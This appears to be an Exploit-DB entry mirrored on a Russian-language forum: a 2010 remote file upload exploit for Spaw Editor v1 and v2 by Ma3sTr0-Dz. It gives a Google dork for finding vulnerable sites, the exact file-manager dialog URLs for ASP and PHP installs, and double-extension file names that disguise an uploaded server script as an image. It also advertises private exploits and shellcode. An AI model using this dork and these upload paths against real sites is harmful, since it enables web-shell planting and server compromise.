- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12672
- Проверка EDB
-
- Пройдено
- Автор
- MA3STR0-DZ
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- N/A
- Дата публикации
- 2010-05-20
Код:
# Tilte: Spaw Editor v1.0 & 2.0 Remote File Upload .
# Date....................: [20-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [Spaw Editor v1 & v2]
# Impact..................: [Remote]
# Site Software ..........: [http://www.spaweditor.com]
# Sptnx ..................: [CmOs_Clr & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [[email protected]]
# Vulnerability: Remote File Upload .
# Part ExplOit & Bug Codes :
Dork [ allinurl:spaw2/dialogs/ ]
Exploit :
For Windows & ASP Sites :
/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images
/spaw2/uploads/files/sec4ever.asp;.jpg
=====================================
For Linux PHP :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files
/spaw2/uploads/files/sec4ever.jpg.php
=====================================
Special Thanks to : Exploit-db Team & Www.Sec4ever.com/home [ Latest Shellcodez - Security News - Priv8 Exploits &
Localz ] .- Источник
- www.exploit-db.com
